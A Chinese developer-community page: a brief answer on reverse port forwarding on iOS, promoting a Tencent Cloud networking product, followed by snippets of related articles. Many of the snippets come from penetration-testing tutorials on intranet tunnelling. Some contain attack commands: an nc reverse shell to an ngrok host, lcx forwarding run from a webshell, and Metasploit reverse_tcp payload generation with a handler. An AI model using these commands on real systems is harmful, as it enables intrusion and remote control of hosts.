开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

iOS中的反向端口转发

在iOS中，反向端口转发是一种网络技术，用于将外部网络请求转发到iOS设备上运行的应用程序。它允许iOS设备作为服务器，接收来自外部网络的请求，并将其转发到设备上运行的特定应用程序。

反向端口转发的优势在于可以实现设备与外部网络之间的双向通信，使得应用程序可以接收来自外部网络的请求并响应。这对于需要远程访问设备上的应用程序或进行远程控制非常有用。

应用场景包括但不限于以下几个方面：

远程访问：通过反向端口转发，用户可以远程访问设备上的应用程序，例如远程桌面、远程文件访问等。
远程控制：通过反向端口转发，用户可以远程控制设备上的应用程序，例如远程监控、远程操控等。
数据传输：通过反向端口转发，可以实现设备与外部网络之间的数据传输，例如实时数据传输、文件传输等。

腾讯云提供了一款相关产品，即腾讯云内网穿透（Tencent Cloud VPC Peering）。该产品可以帮助用户实现反向端口转发功能，提供了安全稳定的网络通信通道，支持多种协议和场景的应用。

更多关于腾讯云内网穿透的详细信息和产品介绍，您可以访问以下链接： https://cloud.tencent.com/product/vpcpeering

相关搜索:Docker中的SSH端口转发 IOS设备的反向TCP？django的Kubernetes端口转发端口转发后显示为关闭的端口域名转发不同的端口 Kubernetes:服务的端口自动转发如何在gitlab中配置端口转发？警告:侦听端口52698的远程端口转发失败无法使用Docker SDK中的端口范围语法进行端口转发通过端口转发访问Kubernetes中的Aerospike集群？端口转发时的HttpListenerRequest.Url 来自SSH终端的转发端口 OpenShift、MongoDB:不带端口转发的连接用于虚拟主机的端口转发通过终端端口转发访问私有子网中的RDS 在Kubernetes中遇到端口转发的连接超时问题？如何在ios react native中防止反向滑动域名转发不同的端口映射计算引擎google云平台的端口转发 DeletePort-删除指定的端口转发规则

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

[喵咪Liunx(3)]端口转发工具rinetd

[喵咪Liunx(3)]端口转发工具rinetd 前言今天笔者为大家带来了另外一款非常优秀的Liunx工具,这个工具有什么用呢?它能帮助我们解决一些特定场景下的端口转发需求,这个工具就是runetd

如何使用Nginx实现反向代理和端口转发？

Nginx是一款性能卓越的高性能Web服务器和反向代理服务器，其在应用场景和互联网领域中有着广泛的应用。本文将重点介绍如何使用Nginx实现反向代理和端口转发。

01

【内网渗透】关于内网代理转发技术

有如下图所示测试环境，外网服务器拥有双网卡，既可与公网进行通信，也可以与内网服务器进行通信。

02

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

SSH开启端口转发需要修改 /etc/ssh/sshd_config配置文件，将 GatewayPorts修改为yes

01

内网转发及隐蔽隧道 | 端口转发和端口映射

端口映射：端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口，提供相应的服务。当用户访问外网IP的这个端口时，服务器自动将请求映射到对应局域网内部的机器上。比如，我们在内网中有一台Web服务器，但是外网中的用户是没有办法直接访问该服务器的。于是我们可以在路由器上设置一个端口映射，只要外网用户访问路由器ip的80端口，那么路由器会把自动把流量转到内网Web服务器的80端口上。并且，在路由器上还存在一个Session，当内网服务器返回数据给路由器时，路由器能准确的将消息发送给外网请求用户的主机。在这过程中，路由器充当了一个反向代理的作用，他保护了内网中主机的安全

01

应用层隧道技术：SSH隧道反向代理（非主流用法）

socks5代理（-D）：相当于ss/ssr指定本地“动态”应用程序级端口转发。这通过分配一个套接字来侦听本地端的端口（可选地绑定到指定的bind_address）来实现。每当与此端口建立连接时，该连接都会通过安全通道转发，然后使用应用协议确定从远程计算机连接到的位置。当前支持SOCKS4和SOCKS5协议，而ssh将充当SOCKS服务器。只有root可以转发特权端口。动态端口转发也可以在配置文件中指定

01

Linux运维：推荐八款Linux远程连接工具

NxShell是一款开源的Linux远程管理工具，是我日常远程Linux服务器必备的工具，界面比较好看、可以直接SFTP。针对软件的功能目前作者还在持续更新当中，还是相当好用的一款Linux远程管理工具。

02

隧道构建：端口转发的原理和实现

众所周知，黑客入侵到内网环境，必做的两件事就是：构架隧道和敏感信息翻查。通过翻查到的敏感信息再结合已构建的隧道就可以顺利攻下内网敏感系统。

渗透测试之端口转发与代理常用端口转发方法

如果Client要对Server的多个端口进行扫描(或是多个Server的多个端口)，逐个配置转发规则很不现实。

03

使用Nginx进行TCP/UDP端口转发

Nginx (engine x) 是一个高性能的HTTP和反向代理服务器，也是一个IMAP/POP3/SMTP服务器。在1.9.13版本后，Nginx已经支持端口转发。之前分享过《Linux安装rinetd实现TCP端口转发》，rinetd配置简单，使用方便，但遗憾的是不支持UDP转发。如果需要同时支持TCP/UDP端口转发可以使用Nginx

02

内网渗透-代理篇

利用代理工具将内网的流量代理到本地进行访问，这样就可以对内网进行下一步渗透，同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议)，工作在OSI参考模型的第5层（会话层）。使用TCP协议传输数据，因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本：

03

linux ssh端口转发的三种方式

ssh是我使用最频繁的两个命令行工具之一（另一个则必须是vim）。有了ssh，我可以远程处理各种可能出现的问题而无需肉身到现场。

01

内网渗透 | 内网转发工具的使用

在渗透测试中，当我们获得了外网服务器（如web服务器，ftp服务器，mali服务器等等）的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段，一般情况下，内网中的其他机器是不允许外网机器访问的。这时候，我们可以通过端口转发(隧道) 或将这台外网服务器设置成为代理，使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。

02

内网全局代理工具及特征分析

端口转发是点对点的方式，代理是点对面的方式，如果我们只需要访问主机的特定的端口，使用端口转发就够了，但通常在渗透进内网之后，我们还需要对整个内网进行横向渗透，这时代理必然是一个高校的方法。代理分为正向代理和反向代理，正向代理常适用于外网可以直接访问到web服务器的情况下，反向代理适用于服务器可以出网，但是外部无法直接访问服务器的情况，针对大型企业，现在几乎都是CDN，负载均衡等设备，所以个人认为现在反向代理更常见于渗透攻击中。

02

内网渗透之各种正反向内网穿透、端口转发（http,socks5）- 渗透红队笔记

在我们拿下一个Webshell的时候，我们没办法把一些工具上传到目标服务器上去使用，那样可能会有风险，而且有的时候还没有特定的环境来使用工具。这个时候我们就可以使用内网穿透来吧服务器的流量代理到本地，就相当于我们是在内网环境，我们就可以使用自己PC上的工具对内网进行扫描，内网渗透，域渗透等等。

03

ATT&CK视角下的红蓝对抗：一. 隧道穿透技术详解

从技术层面来讲，隧道是一种通过互联网的基础设施在网络之间传递数据的方式，其中包括数据封装、传输和解包在内的全过程,使用隧道传递的数据(或负载)可以使用不同协议的数据帧或包。

07

iOS逆向工具之Cydia(iOS)软件介绍

我之前的工具介绍中,也有OpenSSH的介绍. 文章地址: 汇编逆向工具集(二) --> OpenSSH

03

穿越边界的姿势

在企业安全对抗中，红方攻击团队经常会遇到这种情况，在企业的网络边界上获取到部分权限，比如一个web服务器的webshell，然而如何更方便的进行下一步的渗透呢？如何对内网进行渗透测试，这时就需要隧道转发技术，穿透边界防火墙、安全代理等安全设备，进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。

01

巧用SSH转发功能深入穿透内网

ssh能够提供客户端到服务端的加密传输，当http、ftp等协议被防火墙所拦截时，可以考虑使用SSH的端口转发功能，将其它TCP端口的网络数据通过SSH连接来转发。

02

端口转发----lcx.exe

什么情况下需要端口转发： Web服务器在内网中，远程桌面无法连接，因此需要进行端口转发。内网IP的80端口通过端口映射到外网IP的80端口上，内网的WEB服务器通过外网IP反向代理，这个情况下需要进行端口转发服务器处于外网，可以访问外部网络，但是服务器安装了防火墙来拒绝敏感端口的连接。如何判断： ping该域名，是外网IP，但是通过WebShell执行命令查看IP又是内网的一个IP。工具： lcx.exe：

09

常见端口转发工具的使用方式（二）

Ngrok Ngrok一个反向代理，通过在公共的端点和本地端口建立一个安全的通道，其功能可以反向代理出web服务还有端口转发，这里我们主要演示端口转发的功能由于ngrok这个工具官网是要访问外国网站的，所以是能使用国内的Sunny-Ngrok 反弹nc shell 首先我们启动ngrok ./sunny clientid 隧道id 📷 本地监听端口： nc -vv -lp 9991 📷 目标机器： nc -vv server.ngrok.cc 33388 -e cm

08

排查服务不可用是否防火墙配置问题的小窍门

今天用workerman实现一个WebSocket长链接时，在开发环境没问题，但在生产环境（做了反向代理）就一直连接不上，在解决这个问题时有些心得，跟大家分享一下。

01

内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

ICMP隧道简单实用，是一个比较特殊的协议。在一般的通信协议里，如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议，攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下，每个ping命令都有相应的回复与请求。

01

利用 Cobalt Strike 或其他 C2 框架在初始妥协后通过 HTTP(s) 进行枢转

作为进攻型运营商，我们通常有几种主流方法可用于将我们的 C2 流量转移到内部网络上。这些包括但不限于： · SMB 命名管道 · TCP

02

如何远程Debug内网(或者防火墙后)的Java服务

公司现在存在这种情况, Java服务都部署在内网服务器上,只有一台跳板机能够访问到这些机器,我们就不能跟平常一样用IDEA的remote debug功能来远程Debug代码了;

05

Termius for Mac(SSH客户端)

Termius for Mac是一款专业的SSH客户端，它可以帮助用户通过SSH协议连接到远程服务器或计算机，并进行安全的终端访问和文件传输。

03

SSH正向代理

我直接在C上打开了Jupyter notebook（可以百度一下jupyter 远程访问），但是C并没有开放8888端口（jupyter默认是8888端口），只开放了常用的端口，如22端口等。那么首先需要解决的是使B能访问到C端的jupyter网页，这时只需要在B上配置ssh，使用ssh的端口转发的功能来访问C的8888端口

02

reverse_tcp反向连接在实战中的应用

0x02 reverse_tcp实战应用过程 (1) 前期测试试了些已公布的2008提权EXP，不过都失败了，第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地，然后再用lcx把Filezilla Server的14147端口转发出来，lcx执行命令如下。首先VPS机器监听51端口，连接用14147端口： VPS机器执行： C:\>lcx.exe -listen 51 14147 目标机器执行： /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上，返回右上图这样的报错，Google翻译报错信息得知：协议错误：未通过身份验证，关闭连接，连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接，而且我们本地机器也成功的返回了数据，但是好像返回的数据信息中有错误，如下图。当前问题：不能正常把目标服务器的FileZilla Server 14147端口给转发出来，返回数据中出错了，所以无法在本地连接上FileZilla Server服务端。解决办法：利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件，然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用如果我们自己也处于内网环境的情况下，那么就需要先在路由器里进行端口映射配置，然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件，命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下，然后进入到MSF完成所有必填的配置选项，执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听将必填配置选项完成后执行exploit命令进行监听，然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件，如果成功的话就会返回一个reverse_tcp反向连接的会话。成功得到目标机器Meterpreter会话，然后直接使用portfwd命令进行端口转发即可，执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后，我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接

02

Cobalt Strike Spawn & Tunnel

Cobalt Strike 4.2 引入了一组新的“生成和隧道”命令，称为spunnel和spunnel_local。

03

ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透

SSH（Secure Shell）协议是一种加密的网络传输协议，它可以在不安全的网络中提供安全的远程登录和文件传输服务。SSH协议使用加密技术来保护数据的机密性和完整性，使得网络传输数据的安全性得到了保障。除了提供安全的远程登录服务外，SSH协议还可以用于隧道穿透，即将一种网络协议的流量通过SSH连接传输，以绕过防火墙或其他网络限制。

ATT&CK视角下的红蓝对抗：四. 内网穿透之通过Earthworm(EW)进行隧道穿透

ATT&CK视角下的红蓝对抗：四. 内网穿透之通过Earthworm(EW)进行隧道穿透

linux卸载socat,socat在Linux下的使用「建议收藏」

socat我们在前面也已经介绍过了，之前说的是Windows下的利用，如果没有看到的朋友请移步【socat在Windows下的使用】，socat本身就是在Linux下使用的，非要将它放到Windows下使用难免会有水土不服嘛，这次就回到Linux上来进行socat的使用。

02

内网隐藏通信隧道技术——EW隧道

在研究人员的渗透测试中，EW很好用，体积小，Linux为30kb左右，windows为56kb左右。EW是一套便携式的网络穿透工具，具有SOCKS v5服务架设和端口转发两大核心功能，可以在复杂的网络环境下完成网络穿透。

05

记一次绕系统防火墙反弹案例

Date/time：2016年，这次遇到的问题有些奇葩，这里简单记录下测试过程。已经拿到目标主机最高权限，但是在转发3389端口时遇到了问题。

05

巧用 SSH 打通外网限制

这是「进击的Coder」的第 584 篇技术分享作者：李耀 | 漫图：捷哥排版：释然来源：https://zhuanlan.zhihu.com/p/444319023 “ 阅读本文大概需要 5 分钟。 ” 笔者在工作中遇到此场景，如下两条网络限制下，总部如何访问分公司内部 web 服务器？ dmz 服务器可以访问总部外网服务器 22 端口，不可以访问 web 服务器； web 服务器不可访问公网，但是到 dmz 网络无限制。初看需求，我们第一个想到的肯定是内网端口映射到公网，或者 vpn，但是

02

使用 ssh 端口转发实现登陆内网主机

假设我们有两台服务器处于同一内网中，但是我们只有一个公网IP 那么我们怎样在外部访问没有公网IP的服务器呢？

03

内网渗透测试：隐藏通讯隧道技术

上一节中，我们讲解了网络层的隧道技术（IPv6 隧道、ICMP 隧道）和传输层的隧道技术（TCP 隧道、UDP 隧道、常规端口转发）。现如今，TCP、UDP 通信大量被防御系统拦截，传统的Socket隧道也已经濒临淘汰，DNS、ICMP、HTTP/HTTPS 等难以被禁用的协议已经成为了攻击者控制隧道的主要渠道。在这一节中，我们将对应用层的隧道 SOCKS 代理技术进行实验性的讲解，由于小编能力太菜，很多东东也是现学现卖，应用层的DNS隧道我会在未来专门写一个专题进行讲解。

04

内网渗透｜Chisel内网穿透工具

Chisel可用来搭建内网隧道，类似于常用的frp和nps之类的工具。由于目前使用的人比较少，因此对于有些杀软还不能准确的识别出该工具。chisel可以进行端口转发、反向端口转发以及Socks流量代理，使用go语言编写，支持多个平台使用，是进行内网穿透的一个鲜为人知的好工具。

02

网络升级改造

前段时间抛弃了价格还算厚道的移动宽带，换了电信的宽带，终于搞来了我心心念念的公网IP。也想发挥一下N1盒子的性能，没错，我是垃圾佬，公网IP都有了，开整！

01

内网隧道搭建总结(一)

该操作在vm虚拟机中完成，提前安装了Windows7、kali linux、Windows server2008。

01

ATT&CK视角下的红蓝对抗：三. 内网常规隧道利用方法

假设在内网环境中发现主机，通过漏洞获取到该主机控制权限，想要进一步对内网环境进行后续利用，这里可以通过反弹shell的方式去进行穿透，本次实验以nc工具为例来演示不同系统的操作，实验拓扑如图1-1所示。

CENTOS通过iptables做端口转发

因为一些特殊原因，我需要用到端口转发功能，这个功能是这样的，我有2台服务器：A和B，分别是2个不同IP。2台服务器各自的特点是：A网络好，性能差；B网络差，但性能强。(此处“网络”只针对大陆IP访问的网络性能) 所以我的网站放在B上，但是要通过A服务器的IP去访问B服务器上的网站。（注意，这里只是拿放网站做例子，如果只放网站的话，使用nginx做反向代理即可。如果是其他的服务，就需要使用本文章说的端口转发。）例如： A服务器IP：1.1.1.1 B服务器IP：2.2.2.2 通过网上找到的资料，

07

【红蓝对抗】内网代理转发

转发目标主机的3389远程桌面服务端口到本地的8888，使用linux中的rdesktop连接本地的8888端口。

02

内网渗透基石篇-- 隐藏通信隧道技术（上）

在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。

03

Linux内网渗透

能够成功地通过web漏洞获取到webshell，对于一次完整的渗透测试来说，仅仅相当于万里长征的第一步。并不是所有渗透测试都会遇到几百台机器的大内网。

04

跨内外网远程操作Spark

我们知道通过反向ssh可以借助有固定IP的外网服务器登陆没有外网IP的内网主机，但是我们在真正使用的时候可能不仅仅需要远程登陆，可能还会需要内网机器中其他端口提供的服务。比如现在我需要在远处利用Spark程序去操作内网机器里的分布式系统进行工作，这就至少需要调用内网机器的7077端口(默认的Spark调用端口)和9000端口(默认的hdfs端口)。那么这时候我们应当怎么处理呢？

02

ssh-正向与反向代理

常用参数栗子实战常用参数 -N 告诉SSH客户端，这个连接不需要执行任何命令。仅仅做端口转发 -C 表示压缩数据传输 -f 告诉SSH客户端在后台运行 -q Quiet mode. 安静模式，忽略一切对话和错误提示 -g：允许远程主机连接主机的转发端口 -L port:host:hostport 做本地映射端口（正向隧道,监听本地port）需要使用的本地端口号需要访问的目标机器IP地址（IP: 234.234.234.234）需要访问的目标机器端口（端口: 21) -R。port:host:h

03

创建一个简单的SSH服务器

为了加深对SSH协议的理解，准备自己实现一个SSH服务端，需要同时支持Windows、Linux、MacOS三大系统。为了尽量提升性能，准备使用协程(asyncio)来开发。

02

lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

下面就先详细讲解下LXC转发工具与使用方法： lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法: 如在本机B上监听 -listen 51 3389，在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。例:现在有一个ip为222.221.221.22的websehll.用端口扫描发现开放了3389端口可是我们输入外网IP可是不能正常链接。那么很有可能就是内网服务器。我们dos执行ipconfig可以看到。

03

内网基础-隐藏通信隧道技术

当我们在外网打下一个点，通过arp，netstat，以及ifconifg（ipconfig）等信息收集，发现此点为dmz，可通内网，那么这时候我们需要在此点上搭建通向内网的隧道，为内网渗透打下坚实基础。

03

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭